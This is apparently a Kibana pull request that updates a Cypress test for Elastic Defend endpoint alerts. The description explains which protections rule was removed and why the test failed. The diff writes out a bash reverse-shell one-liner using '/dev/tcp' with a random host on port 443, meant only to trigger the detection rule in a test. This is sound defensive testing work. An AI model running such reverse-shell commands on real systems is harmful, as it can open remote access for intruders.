### PR TITLE
[8.19][EDR Workflows] Update endpoint alerts test trigger for current protections rules

### DIFF
--- a/x-pack/solutions/security/plugins/security_solution/public/management/cypress/e2e/endpoint_alerts.cy.ts
+++ b/x-pack/solutions/security/plugins/security_solution/public/management/cypress/e2e/endpoint_alerts.cy.ts
@@ -56,10 +56,12 @@ describe('Endpoint generated alerts', { tags: ['@ess', '@serverless'] }, () => {
   });
 
   it('should create a Detection Engine alert from an endpoint alert', () => {
-    // Triggers a Malicious Behaviour alert on Linux system (`grep *` was added only to identify this specific alert)
-    const executeMaliciousCommand = `bash -c cat /dev/tcp/foo | grep ${Math.random()
+    // Triggers a Malicious Behaviour alert on Linux system (the `/dev/tcp` reverse-shell
+    // redirect matches the "Potential Reverse Shell Activity via TCP/UDP Socket" endpoint rule;
+    // the random host segment is added only to identify this specific alert)
+    const executeMaliciousCommand = `bash -c sh -i >& /dev/tcp/${Math.random()
       .toString(16)
-      .substring(2)}`;
+      .substring(2)}/443 0>&1`;
 
     // Send `execute` command that triggers malicious behaviour using the `execute` response action
     request<ResponseActionApiResponse>({


### PR DESCRIPTION
The `endpoint_alerts` Defend Workflows cypress test started failing on the 8.19 on-merge pipeline. Its trigger command (`bash -c cat /dev/tcp/foo …`) only matched the endpoint rule "Potential Reverse Shell Activity via Terminal", which was removed from the global protections-artifacts ruleset on 2026-07-10. Endpoints pull the global ruleset at runtime, so no alert was generated and the test 404'd on `logs-endpoint.alerts-default`. This repoints the trigger at a command that matches the still-present "Potential Reverse Shell Activity via TCP/UDP Socket" rule. 8.19 is the only branch running this test (skipped elsewhere via #207529).

Verified locally on a real Multipass endpoint: old command reproduces the 404, new command passes.

<details><summary>LLM description</summary>

Root cause: protections-artifacts commit 98c9f519 (2026-07-10 03:17 UTC) removed `behavior/rules/cross-platform/execution_potential_reverse_shell_activity_via_terminal.toml` (id d0e45f6c), the only rule matching a bare shell exec with `/dev/tcp` in the command line. The surviving rule "Potential Reverse Shell Activity via TCP/UDP Socket" (id 73c3fc93) additionally requires a redirect token, so the new trigger `bash -c sh -i >& /dev/tcp/<hex>/443 0>&1` satisfies both conditions. Alert match via `process.group_leader.args` (verbatim command string) is preserved. Kibana PR #277414, the ES snapshot bump (Jackson 2.15 to 2.18.8), and the nightly agent build were all ruled out with evidence.

</details>

Related to #207529
